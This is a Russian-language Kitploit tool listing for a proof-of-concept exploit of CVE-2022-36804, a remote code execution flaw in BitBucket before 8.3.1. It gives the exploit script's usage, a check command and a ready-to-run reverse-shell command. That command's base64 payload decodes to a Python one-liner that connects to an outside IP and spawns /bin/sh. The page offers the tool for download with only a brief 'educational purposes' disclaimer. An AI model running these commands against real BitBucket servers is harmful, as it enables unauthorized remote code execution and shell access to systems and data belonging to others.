Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-36804 — Реальный эксплойт для BitBucket RCE CVE-2022-36804 | Kitploit
Инструменты/GitHubGitHub/notdls/cve-2022-36804
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubnotdls/cve-2022-36804

CVE-2022-36804

Реальный эксплойт для BitBucket RCE CVE-2022-36804

Репозиторий
3571 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-36804 PoC

Этот репозиторий содержит простой эксплойт, подтверждающий концепцию, для недавней уязвимости удалённого выполнения кода в BitBucket (CVE-2022-36804). Для эксплуатации этой уязвимости требуется доступ к репозиторию на целевой системе; если у вас нет учётных данных, на цели должны быть публичные репозитории.

Использование

root@kitploit:~
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
                  [--check]

Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)

optional arguments:
  -h, --help            show this help message and exit
  -p PROJECT, --project PROJECT
                        The name of the project the public repository resides in (E.g.
                        testproject)
  -r REPO, --repo REPO  The name of the public repository (E.g. testrepo)
  -u URL, --url URL     The URL of the BitBucket server (E.g. http://localhost:7990/)
  -c COMMAND, --command COMMAND
                        The command to execute on the server (E.g. 'curl http://canary.domain/')
  --proxy PROXY         HTTP proxy to use for debugging (E.g. http://localhost:8080/)
  --session SESSION     The value of your 'BITBUCKETSESSIONID' cookie, required if your target
                        repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
  --check               Only perform a check to see if the instance is vulnerable

Примеры

Проверка уязвимости экземпляра

Чтобы проверить, уязвим ли экземпляр, выполните следующую команду:

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check

Установка reverse shell

Приведённая ниже команда может использоваться для установки reverse shell на целевой машине (base64-полезную нагрузку необходимо будет обновить с учётом параметров вашего слушателя):

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d  | bash |"

Благодарности

  • TheGrandPew — обнаружение и сообщение об ошибке

Отказ от ответственности

Этот эксплойт предназначен для образовательных/исследовательских целей. Я не несу ответственности за то, как люди будут его использовать. Будьте добры :)

Скачать инструмент